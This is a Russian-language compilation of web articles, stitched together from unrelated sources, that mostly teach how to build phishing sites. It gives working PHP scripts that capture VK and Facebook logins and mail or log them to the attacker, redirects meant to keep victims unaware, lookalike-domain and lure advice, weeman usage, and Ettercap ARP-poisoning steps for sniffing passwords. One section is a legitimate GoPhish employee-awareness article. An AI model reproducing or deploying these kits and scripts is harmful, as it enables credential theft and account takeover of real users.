Как написать фишинг сайт

Нихао, скамерсанты! Сегодня я научу вас копировать совершенно любой сайт, для фишинга. Описал все подробно, так что проблем возникнуть не должно. Статья ориентирована на новичков в таких вещах, как html и php, но даже если вы разбираетесь в теме, можете почитать, может быть, найдёте что-то новое для себя. Данные, введённые на сайте будут отправляться на наш email. Для примера будем создавать копию Для просмотра ссылки Войди или Зарегистрируйся.

Подготовительные мероприятия

Перед началом нам надо:

• определиться с тем, какой ресурс мы копируем
• завести новый ящик (не стоит использовать свой основной для получения данных)
• Для просмотра ссылки Войди или Зарегистрируйся Notepad++ (опционально, но настоятельно рекомендуется). На всякий случай: Для просмотра ссылки Войди или Зарегистрируйся

Готово? Начинаем.

Скачиваем страницу входа

Тут всё просто. Заходим на целевой сайт, нажимаем Ctrl+S, создаём для нашего сайта папку там, где нам нужно, выбираем «Страница (полностью)», пишем «Для просмотра ссылки Войди или Зарегистрируйся» и жмём кнопку Сохранить.

Сделали? Отлично. В папке, созданной вами для сайта, появятся файлы и папки. В моём случае:

Исправляем неправильно сохранённый сайт. Открываем index.html чтобы посмотреть, всё ли хорошо сохранилось.

У меня, например, не всё. Сохранённый мною сайт выглядит так:

В то время как оригинал — так:

Всё хорошо, единственное отличие — картинки со смартфонами, они не сохранилась (картинки в целом, бывает, не сохраняются, это относится не только к вк). Сейчас исправим. Заходим на Для просмотра ссылки Войди или Зарегистрируйся, нажимаем Ctrl+Shift+C, любимое сочетание клавиш у всех малолетних хацкеров, для изменения кода страницы. При наведении на элементы страницы они подсвечиваются, а при нажатии справа мы видим код этого элемента. Например, при нажатии на телефон слева:

Сверху мы видим html код, а снизу — стили, применённые к объекту.

Снизу

Попытаемся понять, откуда же сайт берёт картинку. В коде элемента никаких ссылок на картинку нет, а вот в стилях, снизу, мы видим строку.

Попытаемся понять, откуда же сайт берёт картинку. В коде элемента никаких ссылок на картинку нет, а вот в стилях, снизу, мы видим строкуКод HTML:

background-image: url(/images/login/ru/reg_android_ru.png);

и по этой ссылочке как раз и лежит изображение с телефоном. Нажмём ПКМ, затем Open in new tab:

В новой вкладке открывается пикча. Нам необходимо получить ссылку на неё (также, как вариант, можно скачать её к себе в папку с сайтом, но в этом, я считаю, нет необходимости). Чтобы получить ссылку, как нетрудно догадаться, жмём на адресную строку нашего браузера и копируем находящееся там содержимое.

Теперь, когда ссылка в наших руках, а вернее в нашем буфере обмена, мы открываем html-код сохранённой нами страницы. Для этого жмём ПКМ на файле Для просмотра ссылки Войди или Зарегистрируйся, затем тыкаем на Edit with Notepad++ в выпадающем меню. Код открыт. Теперь нам надо найти тот участок кода, что отвечает за смартфон слева. Для этого снова Ctrl+Shift+C на странице входа и снова тыкаем на смартфон слева. Справа начинает подсвечиваться такая строка с кодом:

Нам надо найти эту же строку в скачанном сайте. Для этого делаем двойной клик по тексту, идущему после «class=», то есть мы будем искать объект с таким же классом. Копируем то, что выделилось (название класса), в моём случае «LoginMobilePromoDevice LoginMobilePromoDevice—android LoginMobilePromoDevice—ru». Заходим в Notepad++, жмём Ctrl+F, потом Ctrl+V, потом Enter. Повезло, совпадение всего одно, гадать не придётся:

При сохранении сайта у этого элемента пропал стиль. Так вернём же его! Для этого в строке «<a class=»LoginMobilePromoDevice LoginMobilePromoDevice—android LoginMobilePromoDevice—ru» target=»_blank» href=»Для просмотра ссылки Войди или ЗарегистрируйсяДля просмотра ссылки Войди или Зарегистрируйся«>» перед символом «>» дописываем «style=»background-image: url(Для просмотра ссылки Войди или Зарегистрируйся)»«.

Было:

Код HTML:

<a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="https://play.google.com/store/apps/details?id=com.vkontakte.android">

Стало:

Код HTML:

<a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="https://play.google.com/store/apps/details?id=com.vkontakte.android" style="background-image: url(https://st.vk.com/images/login/ru/reg_android_ru.png)">

Жмём на

чтобы сохранить. Теперь снова открываем index.html в браузере и видим, что теперь там есть одна из пикч с телефонами.

Теперь аналогичным образом возвращаем на своё законное (или не очень) место второй смартфон. Сама копия готова. Осталось направить данные из формы на наш email.

Сама копия готова. Осталось направить данные из формы на наш email.

Отправляем логин и пароль на email

Теперь ищем в коде нашу форму для входа, вот эту:

Для этого в Notepad++ жмём Ctrl+F и пишем «Телефон или email».

Эти серые буквы в текстовом поле, которые исчезают когда пользователь начинает что-то писать называются placeholder. Так что первое, что нашлось в коде (

) нам не подходит. Нажимаем «Найти далее» и уже теперь мы находим нужную нам строку, а именно «

», строка и отвечает за поле ввода, которое мы видим на странице входа, вот это:

Из этой строки нам понадобится запомнить, чему равен аргумент name, в данном случае его значение — email. Рядом есть такая строка:

В ней тоже смотрим чему равен name, видим, что name=»pass», запоминаем это значение.

Теперь сама отправка на email. Создадим в папке сайта файл Для просмотра ссылки Войди или Зарегистрируйся(для этого создаём .txt файл и меняем в нём расширение и название). Открываем его с помощью Notepad’a и вставляем туда этот код, меняя некоторые данные на те, что нужны вам:

Код PHP:

<?php
$message = $_POST['email'] . ':' . $_POST['pass']; //это (в кавычках) те самые значения аргумента name, которые мы запоминали. Если вы копируете какой-то другой сайт, то замените значения на свои
$message = wordwrap($message, 70, "<br>");
mail('[email protected]', 'Vk', $message, "From: [email protected]"); //первую почту ([email protected]) на свою меняйте, вторую ([email protected]) - не трогайте
?>//Да, очень устаревший способ для отправки email'а, но так будет быстрее всего. Письма сразу ищите в папке спама.

Email отправили, теперь, чтобы было не так палевно, добавим перед ?> еще одну строку, которая перенаправит жертву на адрес Для просмотра ссылки Войди или Зарегистрируйся (это уже сам вк), на котором он увидит, что неправильно ввел пароль, введёт его ещё раз, зайдёт в свой акк, поймёт, что всё норм и навсегда забудет про этот случай. Так вот, строка, которую надо добавить:

Код PHP:

header('Location: https://vk.com/login?m=1');

В итоге получилось:

Код PHP:

<?php
$message = $_POST['email'] . ':' . $_POST['pass'];
$message = wordwrap($message, 70, "<br>");
mail('[email protected]', 'Vk', $message, "From: [email protected]");
header('Location: https://vk.com/login?m=1');
?>

Сохраняем этот файл, напомню, с названием Для просмотра ссылки Войди или Зарегистрируйся в папку сайта. Вернёмся к Для просмотра ссылки Войди или Зарегистрируйся. Мы не сделали ничего, чтобы при нажатии кнопки Войти открывался именно файл login.php. Исправим это. Помните, как мы искали форму по тексту «Телефон или email»? Так вот, вернёмся к тому месту в коде. Оно выглядит так:

А синей стрелкой показана та страница, на которую перенаправляется пользователь после нажатия на кнопку «Войти». Меняем этот адрес на Для просмотра ссылки Войди или Зарегистрируйся. Вот, так-то лучше:

Тестируем наш сайт-копию локально

Попробуем запустить сайт локально, то есть просто дважды тыкнем на Для просмотра ссылки Войди или Зарегистрируйся. Надо понимать, что локально .php файл должным образом работать не будет, но об этом чуть позже. Пока что откроем Для просмотра ссылки Войди или Зарегистрируйся. Для теста напишем рандомные символы в поля логина и пароля:

Жмём на кнопку Войти, она принимает такой вид:

И потом, после долгой загрузки, мы видим это:

Не повезло не повезло. Но нас так просто не остановишь, так ведь? Снова открываем Для просмотра ссылки Войди или Зарегистрируйся в Notepad, снова жмём Ctrl+F, ну и, как вы, вероятно, догадались, пишем туда фрагмент из текста предупреждения, например «Не удаётся пройти авторизацию по». Всего одно совпадение на весь код, отлично.

Удалим отсюда строку {«globalWarning»:»Предупреждениe»,»globalHttpsRequestError»:»Не удаётся пройти авторизацию по защищённому соединению. Чаще всего это происходит, когда на вашем компьютере установлены неправильные текущие дата и время. Пожалуйста, проверьте настройки даты и времени в системе и перезапустите браузер.»}, сохраним, снова откроем Для просмотра ссылки Войди или Зарегистрируйся, снова введём данные, снова жмякаем по кнопке Войти и теперь уже нас перенаправляет на страницу login.php. Отлично. Вместо страницы, правда, откроется сам код, а email никуда не отправится, но так и должно быть, потому что сайт сейчас всё ещё у нас на компе.

Так что продолжим.

Загружаем всё на хостинг

Для тестирования подобных штук нормальные люди создают локальный сервер, используют какие-то там апачи, вроде как, но я, так уж вышло, к нормальным не отношусь, поэтому юзаю бесплатный хостинг чтобы тестить свои шизофренические коды на php. Вы можете использовать любой хостинг, но он обязательно должен поддерживать php. После регистрации на хостинге открываем File Manager и закидываем в папку public_html наши файлы из папки с сайтом Может возникнуть проблема с кодировкой, у меня вот возникла:

Чтобы пофиксить, надо просто открыть в File Manager наш .html-файл и скопировать весь код из Notepad’a сюда. После жмём save&close, обновляем страницу и видим, что проблема исчезла:

На бесплатном хостинге всё тестим, а дальше сами разберётесь, куда свой сайт пихать.

Вот, в общем-то, и всё. Надеюсь, у вас всё получилось. Удачи!

Приступим

Сначала давайте рассмотрим зависимости

1. python 2.7

2. pip2

3. python-dev

И приступаем к установке
Сначала надо клонировать его к себе на ПК:

Код:

git clone https://github.com/evait-security/weeman.git

Перейдем в директорию weeman

И запускаем weeman.py

После запуска видим такую картину:

Итак начнем создание фишинг сайта:

Сначала выберем наш сайт

Код:

set url https://www.facebook.com

Выберем порт

И напишем куда после этого будет направлять пользователя

Код:

set action_url https://www.facebook.com

И запуск

Потом если кто-то зайдет и введет свои данные мы увидим примерно такую картину

email => [email protected]
pass => password123

Для того, чтобы подложить жертве этот сайт мы можем воспользоваться приложением вроде Ettercap или LanGhost для совершения атаки посредника. Благодаря этому, мы получим возможность перехватывать и анализировать его трафик и даже отправлять собственный трафик в его компьютер. Другими словами, из-за того, что он подключился к нашей точке доступа, мы получили полный контроль над всеми входящим и исходящим данными. Если он действительно загружает детское порно, мы это увидим.

Кроме этого, мы сможем перехватывать электронные письма и пароли к другим приложениям и сетям. При желании, мы даже можем внедрить в его систему meterpreter или другое приложение для прослушки, если хотим получить больше информации.

Ettercap
Ettercap – open source утилита для анализа безопасности компьютерных сетей. Основное предназначение которой – MITM атаки (Man In The Middle attacks – атаки типа “человек по середине”). Имеет возможность sniffing of live connections, фильтрация контента на лету, а так же много других интересных возможностей. Поддерживает как активные, так и пассивные вскрытия протоколов и включает большое количество функций для анализа сети и узла.

Более подробную информацию, можно найти на официальном сайте Ettercap.

Установка/Настройка Ettercap
Скачать и установить Ettercap можно из исходников – здесь. В качестве альтернативы можно воспользоваться следующей командой:

Код:

apt-get install ettercap-gtk ettercap-common

Прежде чем приступать к выполнению, выполним небольшую настройку. Открываем файл /etc/etter.conf:

Находим в нем вот эти строки и раскомментируем их:

Код:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

После того, как все перечисленные выше операции сделаны, запускаем Ettercap. Однако у некоторых, в том числе и у меня, Ettercap работать не будет. Будут появляться ошибки вида “SEND L3 ERROR“. Чтобы такие ошибки не появлялись, воспользуйтесь следующей командой:

Код:

# echo "1" > /proc/sys/net/ipv4/ip_forward
# cat /proc/sys/net/ipv4/ip_forward

Теперь все должно работать нормально и ошибки не должны выскакивать.

Перехват паролей
Для начала посмотрите на архитектуру сети (см. рисунок ниже), которая будет использоваться. Это нужно для того, чтобы вы хорошо понимали, что и от куда берется:

Запускаем Ettercap:

Перед нами появится окно приложения, как показано ниже

Щелкаем по кнопке Sniff -> Unified sniffing. После этого выбираем интерфейс, который используется. У меня это eth0:

В верхнем меню нажимаем кнопки Hosts – Scan for hosts

Теперь опять щелкаем Hosts – Hosts list. Появится окно, как показано на рисунке ниже:

Здесь нам нужно выбрать цели, т.е. выбрать машину, которая будет выступать в качестве “жертвы” и шлюз. Как видно из архитектуры сети, которую используем, в качестве “жертвы” выступает машина с IP-адресом = 192.168.1.3. Ну а в качестве шлюза IP-адрес = 192.168.1.1. Поэтому выбираем 192.168.1.3 и нажимаем кнопку Add to Target 1. Теперь щелкаем 192.168.1.1 и нажимаем кнопку Add to Target 2.

Далее щелкаем Mitm – ARP poisoning. После этого выбираем Sniff remote connections:

Нажимаем ОК. Осталось только запустить. Для этого нажимаем на кнопку Start – Start sniffing.

Sniffing запущен. Осталось подождать, когда пользователь будет вводить свои данные, например от почтового аккаунта:

Как только он ввел свои логин/пароль и успешно вошел на свой почтовый ящик, злоумышленник также успешно перехватил его логин и пароль:

Код:

HTTP : 94.100.184.17:443 -&gt; USER: <strong>my_testing_akk</strong>  PASS: <strong>my_secret_password</strong>  INFO: http://mail.ru/

Фишинг «своими руками». Опыт компании «Актив», часть первая

Спамом в наше время никого не увидишь. Мы к нему привыкли и уже воспринимаем как данность. С другой стороны, спам перестает быть просто рекламой, все больше и больше «писем счастья» являются фишингом. Текст данных писем составляется с целью побудить получателя выполнить то или иное действие.

Немного теории

Фи́шинг (англ. phishing, от fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.

«Спирфишинг» (англ. spear phishing ) – вид фишинга, при котором злоумышленник формирует фишинговое письмо под конкретного получателя, используя собранные ранее данные о получателе.

Почему это все так опасно?

Перейдя по вредоносной ссылке или открыв вложение к письму, вы запускаете вирус или троян, который может получить контроль над вашим компьютером и информационными системами компании. Спирфишинг – более опасный вид фишинга. Зловредность его связана с тем, что любой человек, получив персональное, адресованное именно ему письмо, уже не считает это письмо спамом и склонен доверять и открывать любые ссылки/файлы.

А действительно ли это актуально?

Мошенничество с использованием корпоративной электронной почты набирает обороты. За первую половину 2016 года ФБР зафиксировала 22 тыс. жертв этого вида мошенничества, при этом финансовые потери составили более 3 млрд долларов. Почта на сегодня является основным методом проникновения в корпоративную сеть. Злоумышленники не видят разницы между компаниями малого, среднего и крупного бизнеса. Киберпреступники играют вдолгую против крупных компаний, но это не значит, что малый бизнес им менее интересен. Ниже приведу интересную инфографику, показывающую что все больше злоумышленников интересует именно малый бизнес.

Мошенники все чаще и чаще используют шифрование (упоминать WannaCry уже становится плохим тоном) как оружие. 2016 год Cisco назвало «Year of ransome». За первые 3 месяца 2016 года мошенники заработали более 200 000 000$. По оценкам, к концу года «выручка» составила более миллиарда долларов.

Эксперты, сообщество, правоохранительные органы говорят: не платите злоумышленникам, этим вы поощряете их на продолжение деятельности. Но люди и компании платят, уровень шифровальшиков растет. Если первые шифровальщики были похожи на работу студентов первого курса по программированию, то сейчас этим стали заниматься настоящие профессионалы своего дела. Уже встречаются криптографически стойкие шифровальщики.

Компания часто может встать перед выбором: платить, или просто прекратить свою деятельность. Естественно многие, практически все платят. Вам ведь также страшно, как и мне? Нет? Тогда давайте прибавим к этому социальную инженерию. Все мы сейчас используем Facebook, vk, twitter и т.п. Для нашего удобства социальные сети объединяют людей в группы. Мы сами заполняем профили, указываем где мы живем, название компании, в которой работаем.

Я параноик и никогда не указываю название компании, где я работаю, скажете вы? А в друзья вы коллег из компании не добавляете в соцсетях? А все ли они не указывают название компании? Не думаю. Проведя пару часов в сети, исследуя любую интересующую нас компанию, можно достаточно легко и быстро получить список имен и фамилий сотрудников компании. Попадание будет достаточно большим, причем в дополнение к фамилиям можно достаточно легко узнать список увлечений и занятий сотрудников, что может быть использовано против них… например, для создания персонализированных фишинговых писем. Но корпоративные адреса почты найти не так просто, скажете вы? Опять разочарую. Зная название компании, легко найти ее корпоративный сайт. Соответственно, домен уже есть. Зачастую на корпоративных сайтах есть и общие почтовые контакты, они нам тоже пригодятся. Теперь самое сложное: нам нужно получить пару действительных адресов почт сотрудников компании. Для этого можно, например, написать на один из публичных адресов компании. Обратиться в техподдержку, например. Попробовать что-то купить в sales. Если публичного адреса на сайте нет, то всегда можно просто позвонить по телефону и поговорить с секретарем. Социальная инженерия творит чудеса.

Мне посчастливилось побывать на выступлении Chris «loganWHD» Hadnagy. Организация ежегодно проводит соревнования по добровольному взлому (пентесту) других компаний. Вывод из лекции был простой: социальной инженерией можно получить любую информацию. Неподготовленный человек от этого не защищён. К тому же ничто не помешает перед звонком получить данные о секретаре компании из социальных сетей. Это поможет упростить разговор. Итак, будем считать, что мы выяснили пару адресов сотрудников. Смотрим на паттерн в адресах. Он есть! Админы ведь почту не из головы каждый раз придумывают. Паттернов не много: фамилия, ФИО, имя_фамилия и т.п. Накладываем паттерн на базу фамилий и имен, и вот у нас база почтовых адресов компании. Зачем нам все это? Есть такое понятие как Kill chain.

Нас интересует верхняя часть картинки. Итак, мы с вами поняли, что разведку о нас злоумышленники легко проведут в социальных сетях. Соответственно, будет составлен список адресов и осуществлена отправка. Если мы говорим о целевой атаке на компанию, а с учетом разведки предположим, что идет именно она, специально, чтобы обойти стандартные спам-защиты злоумышленники приобрели несколько временных доменов и, соответственно, все наши спам-фильтры будут пройдены, и письмо окажется в почтовом ящике сотрудника. Что дальше? Запуск вложенного файла/переход по ссылке. Неподготовленный пользователь (уж точно несколько среди сотрудников компании) перейдет по ссылке, откроет вложении. По данным Positive Technologies, за 2015 год 24% пользователей, получив письмо, перешли по ссылке, а 15% ввели учетные данные или установили ПО. Процент таких пользователей год от года только растет.

Сработает ли эксплойт? Да (здесь можно вставить много о WannaCry). И вот почему. В отчете HP Enterprise есть вот такая интересная инфографика, это новые уязвимости ПО, появившиеся в 2015 году. Уязвимости есть, и регулярно находят новые. И о них даже знают исследователи:

Часто о них никто и не знает. И бывает вот так (а еще и NSA есть).

На этом «Kill chain» для нас закончен. Заражение произошло, злоумышленник завладел нашим компьютером. Что с ним он будет делать дальше конечно интересно? В любом случае оставим дальнейшее вне рамок данной статьи. Мы хотим понять, что мы можем этому противопоставить? А противопоставить мы можем немногое. Да, можно корпоративными политиками и правилами запретить людям пользоваться социальными сетями и публиковать в них информацию о работе, но с ростом количества сотрудников это становится малореальным. Да, можно тренировать спам-фильтры и использовать дорогостоящие системы обнаружения угроз, но даже самые продвинутые из них зачастую не на 100% гарантируют фильтрацию опасного письма.

Что остается? Остается обучать и еще раз обучать сотрудников на регулярной основе, обучать определять фишинг и просто удалять эти письма, предварительно оповещая ИТ-отдел/службу безопасности о получении подозрительного письма. Недавно в своей компании мы провели «антифишинговое» обучение.

Обучение

Как мы будем учить? А учить мы будем, устраивая социальный пентест своей компании. Можно пойти несколькими способами.

Пентест на заказ

Побродив по просторам интернета можно достаточно легко найти несколько компаний, которые с радостью выпустят вашими социальными пентестерами:

Например, www.infosec.ru — phishman.ru — http://www.antiphish.ru

Можно пойти этим путем, но нужно понимать, что бюджет данного мероприятия будет зависеть от размеров организации и составлять несколько сотен тысяч рублей в минимальном варианте. По желанию заказчика, представители пентесторов даже могут провести полноценный социальный поиск и добыть адреса почты сами, а могут работать и уже с готовыми данными. Обучение по результатам пениста будет стоить отдельных денег. Из интересного в интернете мы нашли еще пару SaS сервисов:

• phishme.com
• infosecinstitute.com/phishsim

Стоить подобные сервисы будут около 20$ в год за почтовый адрес, но нужно учитывать, что готовые базы шаблонов, которые содержатся в них, будут англоязычными (хотя можно всегда загрузить свои шаблоны) + все международные сервисы (видимо для того, чтобы избежать юридических претензий) в обязательном порядке пишут маленькими буквами внизу письма, что это проверка на фишинг, что, по моему мнению, несколько снижает чистоту эксперимента.

Игровые варианты

Одной из лучших методик обучения является игровая. К примеру, недавно так поступил Сбербанк. Метод, без сомнения, эффективный, но содержит пару недостатков. К сожалению, данный метод действует по факту один раз, а учитывая развитие средств и возможностей, фишингу обучаться нужно на регулярной основе. Но что самое главное, игру нужно делать самому и под себя. В открытом доступе готовых решений найти не удалось.

GoPhish

Теперь давайте я расскажу о решении, которое в конечном счете выбрали для себя мы: GoPhish — OpenSource фреймворк для фишинга. GoPhish, пожалуй, незаслуженно обойден вниманием на Хабре. Поиском удалось найти всего одну статью по данному продукту, а продукт стоит того.

Возможности GoPhish

Gophish осуществляет рассылку писем по заранее заданным шаблонам и спискам email-адресов. Также данное ПО использует встроенный веб-сервер для отображения фишинговых страниц. Ссылки для перехода на данные страницы находятся в тексте писем. Для контроля за процессом фишинг-теста используется сущность «кампания» — она объединяет шаблон письма, список адресов со списком «пользователей-целей» (Фамилия, Имя, email-адрес), фишинговую страницу и набор параметров SMTP. После того как «компания» запущена в интерфейсе ПО можно просмотреть, кто из пользователей перешел по ссылке на фишинговую страницу, а кто нет. ПО Gophish также предоставляет API, но нам хватило и базового функционала.

Установка GoPhish

Продукт написан на Go и в скомпилированном виде представляет собой один бинарник. Установка проста и не вызывает проблем, есть хороший и простой мануал. Вся процедура установки сводится к генерации ssl сертификат и созданию простого и понятно config.json файла.

"admin_server" : 
{ "listen_url" : "127.0.0.1:3333",
   "use_tls" : true,
    "cert_path" : "gophish.crt",
    "key_path" : "gophish.key" 
} 

Пояснять что-то здесь я считаю излишним. Все просто и понятно. Осталось запустить сервис, выполнив такую команду:
gophish@gophish.dev:~/src/github.com/gophish/gophish$ ./gophish
Все дальнейшие работы производятся с использованием веб-интерфейса фреймворка. Первое что, нужно сделать — это добавить сотрудников (вкладка «Users & Groups»). Можно импортировать список пользователей из csv файла (например, выгрузив csv с нужными нам полями из AD) или ввести данные пользователей вручную. Далее нужно создать шаблоны писем (вкладка «Email templates»). Текст письма можно вводить в виде текста (вкладка «Text») или с помощью HTML (вкладка «HTML»).

Если отметить флажок «Add tracking image», в письмо будет добавлена «следящая картинка» размером 1х1 пиксель. Картинка используется для отслеживания факта открытия письма пользователем. В тексте письма можно использовать следующие ссылочные значения:

Значение	Описание
{{.FirstName}}	Имя
{{.LastName}}	Фамилия
{{.Position}}	Должность
{{.From}}	Отправитель
{{.TrackingURL}}	url для отслеживания
{{.Tracker}}	Картинка для отслеживания
{{.URL}}	url страницы перехода

Далее создаем «фишинговые» страницы (вкладка «Landing Pages»), HTML -код страницы нужно ввести в соответствующее окно интерфейса. Поскольку мы не собираемся заниматься реальным фишингом среди своих сотрудников, а хотим их обучать, в качестве фишинговый страницы мы использовали страницу с обучающим материалом, рассказывающим сотрудникам, что такое фишинг и как не попасться на его удочку. (Шаблон страницы выложим во второй части статьи).

Можно также создавать страницы с полями ввода. Причем есть опции, которые сохраняют в том числи и пароли, введенные пользователями, но лучше пользоваться этим очень аккуратно. Теперь создаем профили отправки (вкладка «Sending Profiles»), т.е. по сути некие почтовые данные от имени кого, сотрудник получит письмо и какой почтовый сервер мы будем использовать для рассылки. На последнем шаге создаем кампанию (вкладка Campaigns). «Компания» объединяет все ранее описанное. После ввода всех параметров нужно нажать кнопку «Launch campaign», и компания запустится автоматически.

За результатами компании можно следить на вкладке «Dashboard».

На данной вкладке показан общий процент, перешедших по ссылкам пользователей и результативность каждой компании в процентах. Всегда можно перейти и посмотреть подробности по компании и увидеть конкретных сотрудников, кликнувших по ссылке.

Продолжение следует

На этом мы завершаем первую часть нашей статьи. Скоро мы добавим вторую половину, в которой поделимся с вами шаблонами фишинговых писем и страницей обучения. Расскажем о реакции наших сотрудников (она порой была не предсказуема и прекрасна!) и поделимся результатами, которых нам удалось достичь. А еще упомянем о наших граблях, на которые посоветуем вам не наступать.
Часть 2

Создание фишинг сайта для новичков

На сегодня эта публикация уже заработала 12,80 рублей за дочитывания
Зарабатывать

Введение

Горячо приветствую всех читающих!

В этой статье я научу как создать фишинговую страницу с нуля, даже если ты вообще в этом не шаришь.

Копирование 

Для начала нам нужно скопировать страницу и выглядеть она должна идентично настоящей.

Чтобы пользователь, зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений о адресе страницы ввёл свой логин и пароль.

• Создаём для фейка отдельную папку. Туда и будем скидывать все нужные для него файлы
• Открываем нужный нам сайт в браузере и заходим на страницу авторизации
• Сохраняем эту страницу: файл — сохранить как… В появившемся окне выбираем тип сохраняемого файла: HTML-файл с изображениями, имя: index (лучше сохранить полную версию страницы).

Разбираемся в HTML

• С помощью блокнота открываем исходный код сохраненной страницы index.htm

Много странных закорючек — это исходный код страницы

Как говориться “глаза бояться, а руки делают”

Имена полей (выделены жирным, в коде идут после «name=») не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol.(оформление и названия зависит от кодера и сайта)

P.S. Блок с надписями «логин», «пароль» и формами ввода почти всегда находится в тэге .

Временно записываем или запоминаем имена этих паролей

Ищем через Ctrl+F «action»

Код:

• Меняем строку и прописываем параметру action значение login.php (если параметра action там нет — введите его сами: action=»login.php»)
• Ищем параметр method (в той же строчке что form и action) и ставим ему значение “post” или “get”
• Сохраняемся и закрываем
• В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Кавычки не трогаем!).
• В третьей строке происходит открытие файла database.txt для записи. Можете назвать этот файл как хотите, хоть IIACCbI_JIOXOB.txt)) Главное — не забудьте как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком.
• Четвёртая строка — запись в файл строки вида n $Log:$Pass n, где n — переход на новую строку, $Log:$Pass — значения переменных с логином и паролем, записанные через двоеточие.
• Строка пятая — сохранение, закрытие файла.
• Последняя строка — редирект (переадресация) на другую страницу (пока юзверь не просёк что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того как введёт логин и пароль (и снова будте аккуратны с кавычкой после адреса — она должна там быть!). Лучше всего отправить его на настоящую страницу (ну откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попорбует снова и зайдёт, ничего не заподозрив!
• Сохраняем файл с именем login.php в папку с фейком
• Регистрируем домен на этом хосте с названием, максимально похожим на адрес страницы, которую мы подделываем (например Vk.login.com), чтобы нашей цели не бросалось в глаза
• Качаем Filezilla или любой другой файловый менеджер

Запуск в интернет

Нам понадобится бесплатный хостинг с поддержкой php

Например:

Freehostia

HostiMan.ru

Free.beget.ru

Free.sprinthost.ru

HyperHost.ua

Hostronavt.ru

Hostkoss.com

Соц.сеть

Самый сложный и творческий этап. Придется импровизировать как заманить жертву на фейк.

Все зависит от тематики и интересов жертвы.

Писать на почту, в другие месенджеры, хоть голубем эту ссылку отправляйте. Это полностью ваша фантазия

Итог

• Мы создали фейковую страницу какого-то сайта, где теперь можем заимствовать пароли (или даже банковские карты).
• По этой схеме можно создавать фейки за 10 минут
• Теперь знаем как отличить фейковый сайт от настоящего и будем смотреть на адрес сайта.
• Сами не переходим по неизвестным и подозрительным ссылкам.

Это статья создана для того чтобы понять как создаются фишинговые сайты и автор не несет никакой ответственности за содеянное.

Заработали сегодня

Посмотреть

Ежедневный конкурс лучших постов
Подробнее

Читайте также

В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.

Что такое фишинг?

Вообще слово fishing переводится как рыбалка. Фишинг – это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.

Будьте внимательными

Как вам могут подсунуть такой сайт, есть пару примеров.

1. На любом ресурсе может быть ссылка, в которой говорится: “добавь меня в друзья и получи за это 10 голосов вконтакте”. Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
2. Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)

И еще куча вариантов, как можно заманить жертву на такой вот сайт.
Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.

Создание фишинг сайта

Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.

И так приведу пример создания фишингового сайта для социальной сети вконтакте.
Открываем любой браузер, заходим по адресу vk.com,

жмем файл => сохранить как =>

Имя файла: index.html
Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.
Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php
Открываем блокнот и вставляем туда этот код.

<?
$Login = $_POST[‘zabor’]; // Логин  жертвы
$Pass = $_POST[‘zena’]; // Пароль жертвы
$log = fopen(‘ups.php’,’a+’); //тут будут лежать пароли жертв
fwrite($log,'<br> $Login:$Pass n’); //производим запись в ups.php
fclose($log); //закрывает ups.php
echo ‘<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>’; // перенаправляем жертву на http://vk.com
?>

Закрываем и сохраняем как icq.php
Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form жмем enter.
Он найдет строчку:

<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”https://login.vk.com/?act=login” method=”POST”>

Меняем её на это:

<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”icq.php” method=”POST”>

Дальше, смотрим чуть ниже и находим строчку:

<INPUT name=”email” id=”quick_email” onfocus=”show’quick_expire’)” type=”text”>

Меняем на это:

<INPUT name=”zabor” id=”quick_email” onfocus=”show(‘quick_expire’)”type=”text”>

Смотрим еще чуть ниже и находим строчку:

